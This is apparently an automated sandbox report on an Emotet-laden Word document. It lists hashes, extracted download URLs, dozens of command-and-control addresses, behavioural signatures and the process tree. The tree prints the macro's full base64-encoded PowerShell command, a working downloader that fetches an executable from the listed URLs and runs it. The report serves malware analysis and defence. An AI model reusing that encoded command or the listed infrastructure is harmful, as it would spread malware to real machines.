Analysis
-
max time kernel
144s -
max time network
150s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
28-07-2020 20:17
Static task
static1
Behavioral task
behavioral1
Sample
emotet_e1_a3590834519cd4c712020818d0313fb9e200d96cb544d750b19d8bb19bd4aa13_2020-07-28__201730._doc.doc
Resource
win7
General
-
Target
emotet_e1_a3590834519cd4c712020818d0313fb9e200d96cb544d750b19d8bb19bd4aa13_2020-07-28__201730._doc.doc
-
Size
169KB
-
MD5
6f489131611caa0d325a2eb3b3209bf7
-
SHA1
e52828558bffb38fc52bb1fc38d1697f7b79b9c1
-
SHA256
a3590834519cd4c712020818d0313fb9e200d96cb544d750b19d8bb19bd4aa13
-
SHA512
738d21e72206cb4bbef4b9438bee88a77ab3e0ebead1a94fb807e8fc40b3be7cf837debe3b4453c64a2404e9ce167fd282b4a96bb8785ac0be4d2f08ad5c7992
Malware Config
Extracted
http://globeartdesigners.com/assets/lR/
http://karerguvenlik.com/bayi/6UF4rtEz/
https://juroca.com/language/Uiv/
https://www.lgpass.com/images/Wk128/
http://m0h.net/nano/WLfQ/
Extracted
emotet
179.60.229.168:443
185.94.252.13:443
189.218.165.63:80
77.90.136.129:8080
217.199.160.224:7080
104.131.41.185:8080
2.47.112.152:80
185.94.252.27:443
186.250.52.226:8080
51.255.165.160:8080
68.183.170.114:8080
191.99.160.58:80
104.131.103.37:8080
181.31.211.181:80
202.62.39.111:80
83.169.21.32:7080
87.106.46.107:8080
72.47.248.48:7080
177.75.143.112:443
190.17.195.202:80
137.74.106.111:7080
181.129.96.162:8080
82.196.15.205:8080
61.92.159.208:8080
190.6.193.152:8080
181.167.96.215:80
143.0.87.101:80
12.162.84.2:8080
212.71.237.140:8080
217.13.106.14:8080
46.214.11.172:80
114.109.179.60:80
89.32.150.160:8080
185.94.252.12:80
177.72.13.80:80
192.241.146.84:8080
189.1.185.98:8080
187.106.41.99:80
219.92.13.25:80
181.30.69.50:80
68.183.190.199:8080
212.231.60.98:80
190.181.235.46:80
157.7.199.53:8080
178.79.163.131:8080
77.55.211.77:8080
204.225.249.100:7080
170.81.48.2:80
104.236.161.64:8080
5.196.35.138:7080
190.194.242.254:443
50.28.51.143:8080
187.162.248.237:80
46.28.111.142:7080
70.32.84.74:8080
203.25.159.3:8080
190.163.31.26:80
177.144.135.2:80
177.73.0.98:443
177.139.131.143:443
177.74.228.34:80
191.182.6.118:80
94.176.234.118:443
45.161.242.102:80
149.62.173.247:8080
144.139.91.187:443
181.120.79.227:80
80.249.176.206:80
71.50.31.38:80
172.104.169.32:8080
192.241.143.52:8080
111.67.12.221:8080
190.96.118.251:443
186.70.127.199:8090
190.147.137.153:443
177.66.190.130:80
70.32.115.157:8080
Signatures
-
Suspicious use of SetWindowsHookEx 13 IoCs
pid Process 424 WINWORD.EXE 424 WINWORD.EXE 424 WINWORD.EXE 424 WINWORD.EXE 424 WINWORD.EXE 424 WINWORD.EXE 424 WINWORD.EXE 424 WINWORD.EXE 424 WINWORD.EXE 3964 369.exe 3964 369.exe 580 msscntrs.exe 580 msscntrs.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1720 powersheLL.exe -
Blacklisted process makes network request 1 IoCs
flow pid Process 21 1720 powersheLL.exe -
Emotet Payload 2 IoCs
Detects Emotet payload in memory.
resource yara_rule behavioral2/memory/3964-8-0x0000000000B10000-0x0000000000B1C000-memory.dmp emotet behavioral2/memory/580-11-0x0000000000570000-0x000000000057C000-memory.dmp emotet -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\MSWB7\msscntrs.exe 369.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 424 WINWORD.EXE 424 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1720 792 powersheLL.exe 66 -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 1720 powersheLL.exe 1720 powersheLL.exe 1720 powersheLL.exe 580 msscntrs.exe 580 msscntrs.exe 580 msscntrs.exe 580 msscntrs.exe 580 msscntrs.exe 580 msscntrs.exe -
Executes dropped EXE 2 IoCs
pid Process 3964 369.exe 580 msscntrs.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 3964 wrote to memory of 580 3964 369.exe 77 PID 3964 wrote to memory of 580 3964 369.exe 77 PID 3964 wrote to memory of 580 3964 369.exe 77
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_a3590834519cd4c712020818d0313fb9e200d96cb544d750b19d8bb19bd4aa13_2020-07-28__201730._doc.doc" /o ""1⤵
- Suspicious use of SetWindowsHookEx
- Enumerates system info in registry
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
PID:424
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABRAFYARgBLAEkAawB5AGgAPQAnAEUAUABEAFIARgBvAGsAZAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBgAFUAUgBJAFQAWQBwAHIATwBgAFQAYABPAGAAYwBPAEwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABLAFYAQwBGAFkAdgBtAGUAIAA9ACAAJwAzADYAOQAnADsAJABEAFYAWABTAEoAawBxAGoAPQAnAE8AVQBRAFgAQgBpAHYAbQAnADsAJABZAE0ASQBGAEYAagBpAGMAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEsAVgBDAEYAWQB2AG0AZQArACcALgBlAHgAZQAnADsAJABPAEQAWQBIAFgAaABlAG0APQAnAFQAUABOAFYAVQBtAGkAYgAnADsAJABBAEsAUwBSAFcAeABjAHYAPQAmACgAJwBuAGUAJwArACcAdwAnACsAJwAtACcAKwAnAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQB0AC4AVwBFAGIAYwBMAGkARQBuAFQAOwAkAEkAQQBIAEEATAB3AGEAZgA9ACcAaAB0AHQAcAA6AC8ALwBnAGwAbwBiAGUAYQByAHQAZABlAHMAaQBnAG4AZQByAHMALgBjAG8AbQAvAGEAcwBzAGUAdABzAC8AbABSAC8AKgBoAHQAdABwADoALwAvAGsAYQByAGUAcgBnAHUAdgBlAG4AbABpAGsALgBjAG8AbQAvAGIAYQB5AGkALwA2AFUARgA0AHIAdABFAHoALwAqAGgAdAB0AHAAcwA6AC8ALwBqAHUAcgBvAGMAYQAuAGMAbwBtAC8AbABhAG4AZwB1AGEAZwBlAC8AVQBpAHYALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGwAZwBwAGEAcwBzAC4AYwBvAG0ALwBpAG0AYQBnAGUAcwAvAFcAawAxADIAOAAvACoAaAB0AHQAcAA6AC8ALwBtADAAaAAuAG4AZQB0AC8AbgBhAG4AbwAvAFcATABmAFEALwAnAC4AIgBzAGAAcABMAEkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFMARABWAFoAUwBhAHMAdAA9ACcATgBTAEIASQBLAGMAYwBwACcAOwBmAG8AcgBlAGEAYwBoACgAJABVAFQATQBLAEcAYQBsAGgAIABpAG4AIAAkAEkAQQBIAEEATAB3AGEAZgApAHsAdAByAHkAewAkAEEASwBTAFIAVwB4AGMAdgAuACIARABgAE8AVwBOAGwAbwBgAEEARABGAGAAaQBMAEUAIgAoACQAVQBUAE0ASwBHAGEAbABoACwAIAAkAFkATQBJAEYARgBqAGkAYwApADsAJABHAFcAWABRAE4AeABkAHcAPQAnAFIAVABaAEUAUABhAGsAZAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAFkATQBJAEYARgBqAGkAYwApAC4AIgBsAGAAZQBOAEcAdABoACIAIAAtAGcAZQAgADIANgA1ADEANAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBSAGAARQBhAGAAVABFACIAKAAkAFkATQBJAEYARgBqAGkAYwApADsAJABQAEwAWQBPAEUAegBxAHQAPQAnAEsARgBMAFMARgBnAGIAZQAnADsAYgByAGUAYQBrADsAJABDAFEAWQBXAFYAZwBiAHoAPQAnAEoAQwBBAFkASAB1AHEAegAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABJAEkAUwBRAFcAZAB3AG0APQAnAEcAQQBVAFgATgB3AGsAYgAnAA==1⤵
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
PID:1720
-
C:\Users\Admin\369.exeC:\Users\Admin\369.exe1⤵
- Suspicious use of SetWindowsHookEx
- Drops file in System32 directory
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\SysWOW64\MSWB7\msscntrs.exe"C:\Windows\SysWOW64\MSWB7\msscntrs.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
PID:580
-